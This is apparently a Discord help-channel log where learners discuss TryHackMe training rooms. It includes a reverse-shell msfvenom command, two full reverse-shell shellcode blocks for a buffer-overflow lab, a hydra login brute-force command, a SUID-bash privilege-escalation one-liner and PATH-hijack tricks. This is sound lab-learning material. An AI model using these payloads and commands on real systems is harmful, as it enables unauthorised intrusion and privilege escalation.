I uploaded the shell, and accessed it here: http://10.10.106.26:3333/internal/uploads/php-reverse-shell.phtml
Nothing pops up in netcat though.

!docs verify

Which room is this for? And as Shadow has pointed out, if you verify you can send screenshots 🙂

I'm sorry, this is pretty much my first time using Discord 😬 I will do that! https://tryhackme.com/room/vulnversity task 4

No worries, We all start with it somewhere 🙂

Are you sure? The code seems to be running on 10.10.106.26 - and I'm running netcat from 10.10.249.216 (obtained from http://10.10.10.10) 🤔

Haha yes, I'm a very self-destructive person

No worries! 🙏

Actually that's a good hint

I see a 500 error 😬

Just as a heads up, the web based Kali instance may be quite outdated, so some things in the future may not be installed/may be broken.

The page was blank so I just didn't care to check 😮‍💨

Good to know! I'll look into the other approach

It was a missing semi-colon. Haha! Thanks 😻

That might not be what's at play here, but worth using the AttackBox, or your own kali with VPN if you prefer that

aaah, a classic

now you've pointed it out it's obvious

I'll definitely try out the AttackBox. I'm too paranoid to switch off the VPN 😬

Yes, did too much Golang lately and this is what happens

Thank you @rocky wind and @hidden shoal

hi people, i've tried those nmpa scan for getkeeper room but doesnt work, dont show any port open... any recomendation?
sudo nmap -A -sS -sC -sV -O IP
nmap --open -p- -A -sS IP
nmap -p- -sCV -sS -O -A IP
nmap -sCV -sS -O -A IP

where is your -Pn option???

oh

ill try

thanks! take a long time to scan but work!

Gave +1 Rep to @vernal mason

why not using rustscan ? way much faster

dnot know it... will install

the output from the nmap scans you did above should have told you the -Pn option and reading the man page will tell you that option is to skip the ping to see if the host is up or not.... for speed you can use -T4 or -T5 if you understand the risk of false positives and negatives increasing with said speed increase

in order to use getkeeper.exe should i instal windows 7 32 bit to debbug it? @hidden shoal can you help me?

no meeping idea

already done it! thanks anyway for your answer!!💪🏻

Gave +1 Rep to @hidden shoal

does anyone know why i cant connect with rdesktop on room Corp?

In the room 'Steel Mountain' why can't I overwrite ASCService.exe as Bill? Why can't I delete, rename or overwrite ASCService.exe by moving a file? I can overwrite it by transferring it from my attack machine.

hi, getting some errors on room breaching AD task 3, using the python script

Hi where should I start for pentesting

#start-here

You might want to post this in #breaching-ad if you haven't already solved this.

I'm not sure but if i remember correctly you have to stop the ASCService and then upload your msfvenom script as that service in the right path ofcourse

And then start the service

Thanks! I managed to do that. What I am trying to understand is how I can overwrite ASCServices.exe when the user 'bill' does not have permission to modify the file.

I'm not sure because i never really checked if he had rights but i think he has permission to add a file to the path which can be checked when you ran the PowerUp.ps1

I could be totally wrong tho and hopefully someone corrects me if I am

Can someone please help me to understand why in Kenobi space task 4 last question can only be solved by "echo /bin/sh > curl" and not by "cp /bin/sh /tmp/curl" ?
When I want to solve the task with the cp command I get the message "curl: 0: Can't open localhost" with the echo command I get root access. What makes the difference?

The file with just a path to a command is assumed to be a script

It's a script that doesn't care about the arguments in this case

Thank you very much, now I understand!

Gave +1 Rep to @keen iris

Hi fam

Just started my red teaming path

we have a channel for that over at #red-teaming-path 🙂

Omg sorry didn’t see that, thanks

Gave +1 Rep to @rocky wind

would assunme you are going to upload a php reverse shell and then visit the page it got upload to and capture the reverse shell with netcat

Gave +1 Rep to @vernal mason

Hello all. I am pretty much at the end of internal, and using hydra to brute force Jenkins login. Thing is, im about 5000 lines through rockyou and don't have it yet. Can I just confirm with anyone that rockyou actually has the correct password in it? XD

by jenkin login, what is your username?

and yes rockyou has the pw

having issues with brainstorm, the ftp directory is not listed so I have no way to grab the files

I have restarted the box multiple times

anyone else have issues with BrainStorm not working?

Also unable to find wreath, the network is no longer their anyone else seen this?

What does it say when you try to list it, something about extended passive mode?

yes then it times out after like 5 minutes

Connect to the ftp, the first thing you enter is passive to toggle off passive mode

Im booting up now, will let you know what happens

thank you so much that did it

Gave +1 Rep to @dense gate

can some one help me understand what this is

eop=$(mktemp).service

what eop stand for ? kind of confused

from Vulnversity module last question

variable i guess?

yeah thank you, i figure out it could be anything

Gave +1 Rep to @magic ivy

Hi.. I'm stuck on the burp suite attack and keep getting connection close

https://dontasktoask.com/

read this so u can ask more effectively next time

Looking for help on the burp suite on intercepting and uploading the payload to find the correct .php extension

There are a couple of burp suite rooms, share the room link and the task number pls

In breaching AD Room I can't connect/ping the servers. I did everything accordingly with my Kali Vmware VM

can anyone help?

Have you downloaded the VPN for that room?

Ok now.....from where do I start...am new

I need assistance pls

@dense gate task 4 in the Vulnversity

https://tryhackme.com/room/vulnversity

Share a screenshot of the results you got with burp pls

You need to disable payload encoding, otherwise the dot will get url encoded

You can do that in the payload tab

turned payload encoding off

Look at the responses there

also known as the length part of the list

I mean I mean the actual text in particular

oh

But also yes the length

Having issues with Brainstorm, when in Immunity Debugger it says that the essfunc.dll is Rebase=True when it should be false, any help would be really appreciated, not able to get correct jump address due to this

Anyone around to help out on the vulnversity task 4

I am confused on how to read the burp suite

YAYYYY I finally did it!

Now my only question is why on the second attempt does the connect

upload not succeed ?*

Hello! Can any hacker tell me what goes on in your mind as you are pentesting? I'm trying to figure out the mindset

Getting in to something you shouldn't have access to is fun thats all for me lmao

Love puzzling!

Ok, so I found (unintended way) to escalate from apache straight to root, without necessity of using path from jjameson user, is there a channel to report this?

oh the room is daily bugle

cve_2021_4034

i used exploit suggester on metasploit and it was the first one on list

Yes i was just thinking it was maybe too easy way to solve it ^^

ok thanks

Hello i am stuck on the final step in the room Game Zone
When i try to run the metasploit exploit this error message is shown and no session is created
Exploit failed [unreachable]: OpenSSL::SSL::SSLError SSL_connect returned=1 errno=0 peeraddr=127.0.0.1:10000 state=error: wrong version number

Can you pls tell how to fix this

Hi, I am new here and want to do the OSCP. can someone please help me with the path? From which course should I start?

Depends on your knowledge level, Start wiht Jr. Pentester

Working on GameZone rn, Quick question, did SQLmap take forever to pull out the DB?

I started my SQLMap and litterally went to drop off my car for inspection and get a bagel and when I came back its still going.. lol

Hi everyone, i am currently blocked at this question in the active directory module: "Which group normally administrates all computers and resources in a domain? ".
I thought it was the group "computers" because in the doc it is specified that any machine joining the network will be put in the computer's group.
Maybe it is not about the OU ?
Do you have any suggestions?

is this the AD basics room @tired salmon

yes it is @trail shard

Think about what groups are in a domain

The answer is in the text for you

Key word 'Administrates'

ok I got it thanks for your help !

no prob

Anyone recently complete GameZone? I've read the root.txt flag but THM is not letting me submit? I wasn't able to get the MSf exploit working but seemed to get it another way, any tips?

you can skip the test other parameters then it will work fine

finally got the room to accept my answer, why it didnt im not sure

I added a space to the front of it lol

@trail shard did your metasploit exploit work?

It did not, I tried to setup the proxies option but I didn't fully understand how the proxies option and the rhosts option were supposed to be set

I had a ssh tunnel with -D 9090 open to the box and I tried setting proxies in msf to socks4:127.0.0.1:9090 but the login attempt would fail

I had to pull up a walkthrough and realized I could read the root flag in the browser but it still bothered me why the msf exploit didn't work

I just didn't know how to make sure it was going thru the proxy alright

also wasn't sure if RHOSTS was supposed to be 127.0.0.1 or something else

Rhosts was supposed to be set to 127.0.0.1 only
but it was giving me SSL error so i also had to read the root flag via browser only

yeah same here

Anyone work on Skynet recently? stuck on getting my reverse shell to execute, im following a writeup but just not sure why my shell isn't executing

I included it via RFI, and the web app successfully grabs my php shell from my machine but it just doesn't execute and my shell doesn't open on my listener, in the walkthroughs it seems as though the shell will execute when it's uploaded from your simple python server..mine just isnt doing that

I stuck in OVERFLOW1 challenge

Can anybody help me?

when I run the exploit.py final time it says:-

Traceback (most recent call last):
File "/home/kali/tryhackme/exploit.py", line 42, in <module>
buffer = prefix + overflow + retn + padding + payload + postfix
TypeError: can only concatenate str (not "bytes") to str

nope not yet.

I'm trying since yesterday.

Okay let's google first.

then I'll ask for help

the exploit.py runs when I modify:-

buffer = prefix + overflow + retn + padding + payload + postfix

To

buffer = prefix + overflow + retn + padding + str(payload) + postfix

This

but I didn't get the reverse shell.

I suppose to get a reverse shell right?

I know I'm missing something, but I can't find what it is.

Please help me.

@hidden shoal ?

anyone?

Okay I got it.

I generated py instead of c

inside the payload msfvenom c code worked.

This code worked inside the payload:-

"\xbd\xc7\x46\xce\xaf\xda\xcf\xd9\x74\x24\xf4\x58\x29\xc9\xb1"
"\x52\x31\x68\x12\x83\xe8\xfc\x03\xaf\x48\x2c\x5a\xd3\xbd\x32"
"\xa5\x2b\x3e\x53\x2f\xce\x0f\x53\x4b\x9b\x20\x63\x1f\xc9\xcc"
"\x08\x4d\xf9\x47\x7c\x5a\x0e\xef\xcb\xbc\x21\xf0\x60\xfc\x20"
"\x72\x7b\xd1\x82\x4b\xb4\x24\xc3\x8c\xa9\xc5\x91\x45\xa5\x78"
"\x05\xe1\xf3\x40\xae\xb9\x12\xc1\x53\x09\x14\xe0\xc2\x01\x4f"
"\x22\xe5\xc6\xfb\x6b\xfd\x0b\xc1\x22\x76\xff\xbd\xb4\x5e\x31"
"\x3d\x1a\x9f\xfd\xcc\x62\xd8\x3a\x2f\x11\x10\x39\xd2\x22\xe7"
"\x43\x08\xa6\xf3\xe4\xdb\x10\xdf\x15\x0f\xc6\x94\x1a\xe4\x8c"
"\xf2\x3e\xfb\x41\x89\x3b\x70\x64\x5d\xca\xc2\x43\x79\x96\x91"
"\xea\xd8\x72\x77\x12\x3a\xdd\x28\xb6\x31\xf0\x3d\xcb\x18\x9d"
"\xf2\xe6\xa2\x5d\x9d\x71\xd1\x6f\x02\x2a\x7d\xdc\xcb\xf4\x7a"
"\x23\xe6\x41\x14\xda\x09\xb2\x3d\x19\x5d\xe2\x55\x88\xde\x69"
"\xa5\x35\x0b\x3d\xf5\x99\xe4\xfe\xa5\x59\x55\x97\xaf\x55\x8a"
"\x87\xd0\xbf\xa3\x22\x2b\x28\xc6\xb0\x5c\xb0\xbe\xb6\xa2\xd1"
"\x62\x3e\x44\xbb\x8a\x16\xdf\x54\x32\x33\xab\xc5\xbb\xe9\xd6"
"\xc6\x30\x1e\x27\x88\xb0\x6b\x3b\x7d\x31\x26\x61\x28\x4e\x9c"
"\x0d\xb6\xdd\x7b\xcd\xb1\xfd\xd3\x9a\x96\x30\x2a\x4e\x0b\x6a"
"\x84\x6c\xd6\xea\xef\x34\x0d\xcf\xee\xb5\xc0\x6b\xd5\xa5\x1c"
"\x73\x51\x91\xf0\x22\x0f\x4f\xb7\x9c\xe1\x39\x61\x72\xa8\xad"
"\xf4\xb8\x6b\xab\xf8\x94\x1d\x53\x48\x41\x58\x6c\x65\x05\x6c"
"\x15\x9b\xb5\x93\xcc\x1f\xd5\x71\xc4\x55\x7e\x2c\x8d\xd7\xe3"
"\xcf\x78\x1b\x1a\x4c\x88\xe4\xd9\x4c\xf9\xe1\xa6\xca\x12\x98"
"\xb7\xbe\x14\x0f\xb7\xea"

Instead of this code:-

buf = b""
buf += b"\xbf\x77\x36\x06\x95\xd9\xf6\xd9\x74\x24\xf4\x5a\x29"
buf += b"\xc9\xb1\x52\x83\xc2\x04\x31\x7a\x0e\x03\x0d\x38\xe4"
buf += b"\x60\x0d\xac\x6a\x8a\xed\x2d\x0b\x02\x08\x1c\x0b\x70"
buf += b"\x59\x0f\xbb\xf2\x0f\xbc\x30\x56\xbb\x37\x34\x7f\xcc"
buf += b"\xf0\xf3\x59\xe3\x01\xaf\x9a\x62\x82\xb2\xce\x44\xbb"
buf += b"\x7c\x03\x85\xfc\x61\xee\xd7\x55\xed\x5d\xc7\xd2\xbb"
buf += b"\x5d\x6c\xa8\x2a\xe6\x91\x79\x4c\xc7\x04\xf1\x17\xc7"
buf += b"\xa7\xd6\x23\x4e\xbf\x3b\x09\x18\x34\x8f\xe5\x9b\x9c"
buf += b"\xc1\x06\x37\xe1\xed\xf4\x49\x26\xc9\xe6\x3f\x5e\x29"
buf += b"\x9a\x47\xa5\x53\x40\xcd\x3d\xf3\x03\x75\x99\x05\xc7"
buf += b"\xe0\x6a\x09\xac\x67\x34\x0e\x33\xab\x4f\x2a\xb8\x4a"
buf += b"\x9f\xba\xfa\x68\x3b\xe6\x59\x10\x1a\x42\x0f\x2d\x7c"
buf += b"\x2d\xf0\x8b\xf7\xc0\xe5\xa1\x5a\x8d\xca\x8b\x64\x4d"
buf += b"\x45\x9b\x17\x7f\xca\x37\xbf\x33\x83\x91\x38\x33\xbe"
buf += b"\x66\xd6\xca\x41\x97\xff\x08\x15\xc7\x97\xb9\x16\x8c"
buf += b"\x67\x45\xc3\x03\x37\xe9\xbc\xe3\xe7\x49\x6d\x8c\xed"
buf += b"\x45\x52\xac\x0e\x8c\xfb\x47\xf5\x47\x0e\x9a\x9a\x8f"
buf += b"\x66\x98\x64\xa1\x2a\x15\x82\xab\xc2\x73\x1d\x44\x7a"
buf += b"\xde\xd5\xf5\x83\xf4\x90\x36\x0f\xfb\x65\xf8\xf8\x76"
buf += b"\x75\x6d\x09\xcd\x27\x38\x16\xfb\x4f\xa6\x85\x60\x8f"
buf += b"\xa1\xb5\x3e\xd8\xe6\x08\x37\x8c\x1a\x32\xe1\xb2\xe6"
buf += b"\xa2\xca\x76\x3d\x17\xd4\x77\xb0\x23\xf2\x67\x0c\xab"
buf += b"\xbe\xd3\xc0\xfa\x68\x8d\xa6\x54\xdb\x67\x71\x0a\xb5"
buf += b"\xef\x04\x60\x06\x69\x09\xad\xf0\x95\xb8\x18\x45\xaa"
buf += b"\x75\xcd\x41\xd3\x6b\x6d\xad\x0e\x28\x8d\x4c\x9a\x45"
buf += b"\x26\xc9\x4f\xe4\x2b\xea\xba\x2b\x52\x69\x4e\xd4\xa1"
buf += b"\x71\x3b\xd1\xee\x35\xd0\xab\x7f\xd0\xd6\x18\x7f\xf1"

I want to know why.

Can anyone tell me what's wrong?

The code is expecting buf to be a string and not bytes. Example would be to remove the 'b' character from each line.

if I convert the payload to str(payload) the python script runs but won't open the reverse shell.

There is no need to convert the shellcode to a string if you use the msfvenom command provided. You have the correct EIP offset and badchars? ...Try add a breakpoint to the 'retn' and see what happens as the code executes. Do you jump to the NOP addresses?

Hey, I am at first question of task 4 in this room https://tryhackme.com/room/fileinc , and it won't accept my answer. Can't figure out why. I am seeing the contents of /etc/passwd when using the url <ip>/playground.php?file=../../../etc/passwd in my browser, so I would assume /playground.php?file=../../../etc/passwd is the URL it is asking for?

Ah

thanks

Hmm, it doesn't accept /lab1.php?file=../../../etc/passwd either

Yeah, I have the correct EIP offset, badchars and jump to the NOP addresses.

I'm facing another problem. I'm doing Brainstorm challenge. I connected to ftp server but when try "ls" or "dir" the ftp hangs. and says "229 Entering Extended Passive Mode (|||49339|)"

Anyone having this issue?

did you try to use the full file path instead of path traversal?

Hi I have a problem to set up DNS in Breaching Active Directory in Active Directory section, anyone had similar issue?

Same here

I got $ nslookup thmdc.za.tryhackme.com
Server: 1.1.1.1
Address: 1.1.1.1#53

** server can't find thmdc.za.tryhackme.com: NXDOMAIN and cant access to http://ntlmauth.za.tryhackme.com/

I did but nothing works

Just 21, 3389, and 9999

I know that are in the room, but when I try that from the room have: nslookup thmdc.za.tryhackme.com
;; communications error to 10.200.54.101#53: timed out

yes, tun0 10.50.23.41...

and I have ping response, ping -a 10.200.25.101
PING 10.200.25.101 (10.200.25.101) 56(84) bytes of data.
64 bytes from 10.200.25.101: icmp_seq=1 ttl=127 time=50.5 ms

└─$ cat /etc/resolv.conf

Dynamic resolv.conf(5) file for glibc resolver(3) generated by resolvconf(8)

DO NOT EDIT THIS FILE BY HAND -- YOUR CHANGES WILL BE OVERWRITTEN

127.0.0.53 is the systemd-resolved stub resolver.

run "resolvectl status" to see details about the actual nameservers.

search za.tryhackme.com
nameserver 10.200.25.101
nameserver 8.8.8.8

new one is here 🙂 └─$ nslookup thmdc.za.tryhackme.com
;; communications error to 10.200.25.101#53: timed out
;; communications error to 10.200.25.101#53: timed out

To whom have an issues with **brainstorm **room, just try to use different VPN and disable passive mode then it will works fine👍

Now it works, not sure what I have done exactly 🙂

hey guys

im trying Breaching Active Directory room

but i cant quite setting things up

i added the DNS but it doesnt resolve the domain

cant quite ping the THMDC either

im using the attack box btw

lol i scrolled up and see many people having the same problem

Can I use "mona" for buffer overflow in OSCP exam?

Ohh, okay thanks.

Hi there, I am looking for solution of exploiting eternal blue without msfconsole, just wondering if there is any good articles as a reference on how to use the 42315.py for exploiting this vuln? I read a lot of tutorials and none of them work at all

Will give it a go, thanks

Gave +1 Rep to @hidden shoal

Hello, I am working on Alfred. I have been able to get a shell on bruce. I can upload files like winpeas or the msfvenom payload but I am unable to execute them. I have tried to start powershell from the command line but it just hangs. Can I get a little nudge as to how I either get these programs to run or how I get powershell going from the shell I have now? thank you.

Ok...found a way around the above issue. I was able to load incognito.exe to the target machine via cmd. ran it. added a new user and made them administrator. But now there is no Administrator and even when I RDP into the machine I cant find a root.txt flag haha. Have I completely butchered this? Can anyone point me in the right direction.

Hey I am working on the Buffer Overflow Prep room. I was able to do OVERFLOW1 with no problems. However, with OVERFLOW2 and OVERFLOW3, I can find the offset correctly and find all bad chars but not getting a call back from my shell code. Should I be able to? The only questions involve finding the offset and bad chars but I'd like to exploit each one if possible. Just not sure if I should even be able to or not... thanks!

C:\Users\t1_leonard.summers\Desktop>Flag.exe
Flag.exe
Sorry! You are still missing something. No flag for you yet. (7)

Anybody seen this on the Lateral Movement and Pivoting room? Not sure what is missing to run the exe

I did find the jmp as well, I will try some more in a few. Thanks @hidden shoal!

Gave +1 Rep to @hidden shoal

CAN I GET A HACKER FRIEND

For what?

Definitely was me but a good learning opportunity.... I didn't recreate my rev tcp shell code for OVERFLOW2 and it contained bad chars

Daily Bugle. Is there a problem with the room? machine responds to ping, scanned with nmap and hit it with gobuster just fine. tried to browse to the website and it never comes up.

Ensure that you use the http protocol instead of https

I ended up using an attack box. That was the first time I've had issues with a webserver from the vpn.

hello guys i've been trying to crack a password in hackpark machine. sadly, hydra is returning wrong passwords. has anyone encountered this issue?? can someone help me regarding this pls.

btw, this is the screenshot of the problem. i hope someone can help me fix this issue. thanks again, guys

and here's the command that i used: hydra -l admin -P /usr/share/wordlists/SecLists/Passwords/Leaked-Databases/rockyou.txt 10.10.12.92 http-post-form "/Account/login.aspx?ReturnURL=/admin:__VIEWSTATE=ZdyCCuhq7zMYBzGN0u%2FVLKAA3chKH3IorFlH89vOh%2BomSd8b86rVGwfadXtfXLtkQgvsLmcuZJ3Lif5BDgKIgVAd9%2B4aKrR%2Fdjls%2BjHl3WB66uSrWPH3CLke0xjEQdhgGqTXakqW%2B3iQRCSSMcWKqa9EWAmWZpdkqh6E8hiKOaMfyNLyb4ALVkMoEPR%2B7zkdpHqC3z2puf7uuO%2BZKqeY%2F5gBglIHcNjGsQR6Gr0zYlCt5z5xjosDWRo7ujSmHNwzheGmzDqLbbuY7rVYvK%2Bpdtffx4drFxa8LKfQlW%2FYbamz5ZCUjiMm%2Fo9rgzfM24292DwPWHecFWfoIksCfiBBDZZsm50MkPLGv1rpR4OVX9p%2F4TCo&__EVENTVALIDATION=HfTlma6Rxo6%2B3RAeSAbbfa3AiyKaoYonq9Ae7aPQ0fg0BbXwqQrHyu7oonvi7heiKSuPgaicKLOpQWJ19IdIOO7CO%2BkdbKY%2BhCCckGkhO58spRDiRAeWlDd4aHVwocGD9UqC9gvpkePUBJ%2BQ0Eb5SSBmLdVHc%2BKDhiA17iW5UMnyE6V8&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login Failed" -vv

this normally happens to me when I use a wrong response detection and thus every try is considered correct

hello, can you please tell me what parameter/s on my command is/are wrong

@fleet wedge sorry, I don't know the exact solutiin to this part. I'd run one of these requests through burp (including this long parameter stuff) and check the result again. Is there really exactly the string "Login Failed" in the response?
if this doesnt help, you might be able to proxy hydra directly through burp to check the response.

hello, yes there is. it is the parameter before "-vv"

not in your command, but in the http response from the webserver to a login attempt made by hydra

yes, there is

Hello Can anyone help me in room bufferoverflow brainstorm
the first question is how many ports are open
i use nmap every time i get 3 ports are open
but answer is 6
can anyone clear my question
https://tryhackme.com/room/brainstorm

ok thanks

Hi I am trying to exploit eternal red with 40620.py. But I found there is a payload need to be specified which is a shared lib. I am wondering how can I locate or obtain the desired shared library?

does john the ripper automatically use the GPU for password cracking?

hello guys for those who played the hackpark room, can you tell me why did they use 'winPEAS.bat' instead of 'winPEAS.exe' ?

@fleet wedge Not sure. I used the x64.exe

To my understanding .bat was made for systems that didn't support winPEAS.exe and only used if .exe wasn't supported. Exe has colors easier to read.

thanks for answering

No

thanks for answering @keen iris

Gave +1 Rep to @keen iris

Hi guys i try to understand msfvenom payloads.
Usually i use them to generate a payload and then start a multi/handler metasploit listener with the same payload set

e.g.
Will be executed on the target system

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.165.167 LPORT=4443 -e x86/shikata_ga_nai -f exe -o ASCService.exe

Metasploit :

set payload windows/shell_reverse_tcp

Why do i need to set a payload on the listener and could i use a different payload on the listener

Have an investigation into staged vs stageless

ahhhhh

damn

on stageless i can work with only a listener right

staged payload will connect to the syystem and then download the rest of the payload

thats why you need to specify it on the listener too

Also bear in mind there's more to a meterpreter than a plain shell payload

Many more features

Hi guys quick question about ssh tunneling

 ssh -L 9000:imgur.com:80 blub@<ip> 

If i go to localhost:9000 on my local machine, i will see the content of imgur.com? , because blub@<ip> has access to imgur.com and forwards this traffic to my port 9000 through a ssh tunnel?

did i get that right?

hmh?

Hoi guys doing the room relevant right now

http://10.10.75.58:49663/nt4wrksv

this should be a directory of that webserver

but i cant connect to it

Always getting an unable to connect error

How do you know?

i solved itn nmap portscan

and gobuster findings

another dumb question if i want to download printSpoofer

https://github.com/itm4n/PrintSpoofer/tree/master/PrintSpoofer

which of these files do i need to download?

Hi, im have a question. When i upload linpeas script to a linux machine over the /tmp directory and try to run it nothing happens.

But, i can run it in mi home directory

Any clue of what is happening? Thanks!

Sorry the image before not shows that i try indeed to run the script

the last try there you are trying to run the linpeas script in the home folder and not in the tmp folder

Sorry

as you used cd without an arg which takes you to your home folder

There it is

sorry about before

Is because /tmp could be in a separated partition o something of the kind?

yeah /tmp could be on a ramdisk

which is kinda common in some linux distros

And that is the cause of the event?

Separate /tmp isolate it?

not sure actually

you could try placing it in /dev/shm and running it from there to see if there is a difference

ok i will try it

It seems it doesn't work either

Well, i will run it from my home directory and i will continue, thanks for the help any way!

Also systemd has private /tmp for different processes etc. You can see that from above.

oh good to know james

The file has size 0. maybe something broke while copying?

Oh my god, that passed to me hahah

thanks for answering

By the way, any one here know how to handle hydra http-post-form when the web page display a complex error message in a failed login attemp?

Im think that the problem is im not catching well the error message because is matching multiple valid credentials

I first think it will be valid to only copy-paste the middle message but apparently it doesn't

That "HTTP 1.1" bit looks bad

Watch what it's doing through burp or wireshark if you can though, that can help massively

I know that i have other tools but i would like to know what im doing wrong because is obviously a thing in the command, i remember that things like this already happens when you don't write correctly the message error

but

what do you mean with the HTTP 1.1?

Is bad writed?

Ahh

i understand

fuck hahah

This happens to me for copy from Burp hehe

i already fixed, but i obtain the same result

My god

i have it

i wiil not put the answer here

but

i feel very stupid i have to say

i think with using burp / wireshark he meant "still use hydra, but proxy your requests through burp". this way you can easily see what exactly hydra sends/receives and this helps fixing the command :)

just for the future. Good you found it

Ok thanks!

But

I can send log request through hydra and proxy it at the same time with Burp?

Does hydra have a proxy option?

👍 👍 👍

hi everyone! how are ya? I'm just starting the Buffer overflow part (https://tryhackme.com/room/bufferoverflowprep) and i'm actually kinda totally lost, first time encountering buffer overflows (i know how it works etc...) but feels like i'm missing something, some knowledge and bases, before looking at other stuff around do you think it's not especially needed cause this part contains the basics or do i need basic knowledge before? thanks

and i'm reading it at the same time tho

The descriptiin says it does not teach the basics. So it's probably better to learn BO elsewhere, get used to it and then come back to test the knowledge and learn the mono stuff described in the room

Hi! Im kind of confuse, when i list the binary command i see that the command have the SUID bit allowed, that means i execute as his owner, root isnt?

But, when i try to use it the command assume that im not root, why is this happening?

Im the user 'apache' and i wanna edit the crontab file to add a job that makes me root

As I understand it, if the SUID byte is set up i should run the binary as root and open the /etc/crontab

Root has their own personal crontab, that isn't readable by other users

Crontab -e as root will edit that one, rather than the system wide crontab

Hey guys, I'm not sure how to attach to a listener. I've successfully started a reverse shell but for some reason I'm unable to actually exploit this. Hope this is the right channel, very new to Discord.

yep, it’s a python reverse shell

yeah, I just launched another python reverse shell and got caught immediately. Now how do I "convert" this to a shell?

Damn! Think I got it. It's just Ctrl-D to enter shell

Hello. I keep running into this issue with bloodhound where I will upload/drag-n-drop a provided zip to the BH GUI and my graph never updates. I have the same graph from like....4 rooms ago haha. Ive hit refresh, Ive restarted bloodhound. How do I get it to populate the correct info? Thank you

Im in the exploiting AD room and having trouble with the keepass part never see the explorer process any help?

im in the eternal blue room and im trying to run the metasploit eternal blue exploit but it keeps failing :( Any ideas?

i keep terminating and resetting the machine on THM

Which IP are you setting as RHOST?

the machine that I started in the beginning of the room

The ip that appears in the red box?

yes the active machine

Hm, I did it and it worked first time, are you on it now?

i exited out of it for now but i can easily pull it up. I tried multiple times and it didnt work :(

Next time when you set it, type options just to verify you have the correct ones.

If you verify you can send screenshots.

!docs verify

awesome i was wondering why it was not working

@finite pivot

Type options

one sec i closed it ill redo it rn

Is your attackbox ip "10.0.2.15" ?

yes

I'm loading an attackbox

Still got the machine open?

yes

first time.

......

Try quitting that session msf.

Create a new one.

Just set the exploit to blue, leave the payload and just set RHOST, then run.

i opened up an attack box on the tryhackme website and it worked from that. Is there a specific reason it would work from that and not my own linux machine?

10.0 is not your vpn IP

I assumed you were on the attackbox...

If you're on a vm with the vpn, set LHOST tun

0

msf6

So can't be the attackbox

Unless they upgraded 😄

Possibility. 😄

If you're on the vpn with a vm, tun0 catches all your reverse shells etc.

It's never been mine.

When I used VB before.

ohhhh ok ill try that on my vm. Thank yall so much

Gave +1 Rep to @finite pivot

The first thing you will see when opening it is your complete OU hierarchy, as defined before. To configure Group Policies, you first create a GPO under Group Policy Objects and then link it to the 
-->GPO <--
 where you want the policies to apply. As an example, you can see there are some already existing GPOs in your machine:

Hi this is from avtice directory room

shouldnt that be called

To configure Group Policies, you first create a GPO under Group Policy Objects and then link it to the --> OU <--- 
where you want the policies to apply

Hey everyone, I'm doing the Exploiting AD room, and am getting a mimikatz error.

ERROR kuhl_m_lsadump_secretsOrCache ; kull_m_registry_RegOpenKeyEx (SECURITY) (0x00000005)

It appears this is due to the installed version of mimikatz being incompatible with the version of Windows it is being used in.

I'd try to get a more current version of mimikatz onto the box, but currently have to use the attack box because the VPN is not working for this network.

If anyone can help, it'd be much appreciated. Attached is a screenshot for reference.

Hi

I would like to initiate my self into BufferOverFlow but im absolute begginer in all that has to be with memory, stack, pointers etc

The thing is that i already found some good resources to boot into BOF but all of them assume that u have an acceptable knowledge of the bases that i lack of.

Any body here knows of some resource or tutorial of BOF for begginers like me or, instead, a resource to learn the necesary bases to start with BOF?

Thanks!

Then i will continue with the tutorials hehehe but, in any case, do you know how is the name of the field of computing that covers Memory, stack/heap, pointers etc? I know that maybe it isn't necesary to know very deep about this but i feel more confortable like that

hehehe ok

thanks!

On the topic of buffer overflow, when I try to test the programs in the Brainstorm and Gatekeeper rooms on my host computer they crash at a completely different number in any guide. I actually fuzzed gatekeeper to 4000 bytes before I stopped cause I knew it was ridiculous. Anyone know why thats happening? Im testing the programs on Windows 10 with Immunity Debugger

Hello there. Anyone can help me for this ? I tried to list file on ftp but not working. It is about the room Brainstorm

Connect to the ftp again, the first thing you enter is passive to toggle off passive mode, then run ls as usual

Thank you. It works

Gave +1 Rep to @dense gate

Has anyone here had trouble downloading Immunity Debugger from the ImmunityInc website? I've tried on multiple VMs as well as my host system, and keep getting 404s 😡

token and send be four

call be send in see

hi everyone

have a problem

with joomblah.py

screen

[-] Fetching CSRF token
[-] Testing SQLi
Traceback (most recent call last):
File "joomblah.py", line 314, in <module>
sys.exit(main("http://192.168.10.100:8080/joomla"))
File "joomblah.py", line 310, in main
pwn_joomla_again(options)
File "joomblah.py", line 247, in pwn_joomla_again
tables = extract_joomla_tables(options, sess, token)
File "joomblah.py", line 126, in extract_joomla_tables
result = joomla_370_sqli_extract(options, sess, token, "TABLE_NAME", "FROM information_schema.tables WHERE TABLE_NAME LIKE 0x257573657273 LIMIT " + str(offset) + ",1" )
File "joomblah.py", line 78, in joomla_370_sqli_extract
result += value
TypeError: must be str, not bytes

Which room?

Daily Bugle

yes the ip was correct

ok cool, I will search

Anybody able to helo with the GateKeeper room exploit script not working? Im using the same script from brainstorm with minor modifications, but the connection is closing without the bytes being received. Here's a screenshot of the script and the immunity output.

Its sqli so why dont you try sqlmap?

I am working on the Alfred room, I am trying to pass the reverse shell to my Kali VM. I set up the python server to serve the PowerShell script, I get a 200 code however, my netcat does not pick up the reverse shell. I have tried different ports, I have tried resetting my VPN connection, I have read through a few walkthroughs and the only thing that I am seeing is some use a "python -m SimpleHTTPServer" and some use a "python3 -m http.server" - I am using the latter.

Has anyone ran into this issue or am I a one off?

Hello, everyone

I was trying to do Privilege escalation on a linux machine, there was a script running every minute with root privileges, I added the following to it

cp /bin/bash /tmp ; chmod +s /tmp/bash 

then I started it using /tmp/bash -p I was root but with the same env of the low privilege user

This is a demo of what I mean

I'm root but $HOME is /home/juba

The same thing for sudo -l
it asks me for the low privilege user password not for the high privilege user (root)
whoami
root
sudo -l
user juba may run .....

I don't know what is EUID, I'm going to search for it

Thanks @hidden shoal

Gave +1 Rep to @hidden shoal

Hello, I m doing the Jenkins Machine rn. I don't wanna use metasploit so I did a little bit of research and found a few useful scripts for LocalPrivEsc (All kinds of potatoes, RougeWinRM) but I couldn't figure out a way to compile them. No guides touch on that and have ready .exes so it must be something very obv that I m missing. Some help please ?
Edit: Please ping me in the response. Thanks !

